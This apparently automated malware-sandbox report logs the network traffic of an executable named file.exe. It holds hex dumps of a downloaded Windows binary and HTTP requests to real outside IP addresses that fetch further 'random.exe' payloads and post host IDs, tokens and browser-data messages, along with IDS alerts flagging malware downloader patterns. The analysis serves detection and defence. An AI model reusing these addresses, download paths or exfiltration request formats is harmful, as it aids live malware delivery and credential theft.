00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 7a 6d 79 61 61 78 72 00 60 2a 00 00 a0 00 00 00 5a 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 63 77 6d 7a 74 77 00 20 00 00 00 00 2b 00 00 04 00 00 00 94 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 98 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:53 GMTContent-Type: application/octet-streamContent-Length: 2800128Last-Modified: Tue, 10 Dec 2024 03:27:54 GMTConnection: keep-aliveETag: "6757b53a-2aba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 9b 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 7a 6d 79 61 61 78 72 00 60 2a 00 00 a0 00 00 00 5a 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 63 77 6d 7a 74 77 00 20 00 00 00 00 2b 00 00 04 00 00 00 94 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 98 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013605001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013606001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013607001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 46 45 32 32 32 46 45 46 42 34 33 37 35 30 37 37 33 35 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="hwid"9EFE222FEFB43750773564------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="build"stok------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="message"browsers------KJDAECAEBKJJJKEBKKJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"plugins------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 2d 2d 0d 0a Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="message"fplugins------DHIJDHIDBGHJKECBFIID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIJDBKEGIDHIDAFCFHost: 185.215.113.206Content-Length: 5387Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013608001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013609001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="file"------KJKKKJJJKJKFHJJJJECB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 80.82.65.70 80.82.65.70
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49833 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49855 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49887 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49874 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49894 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49906 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49901 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49921 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49937 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49948 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49984 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49993 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50041 -> 104.21.64.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9E0C0 recv,recv,recv,recv, 0_2_00A9E0C0
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
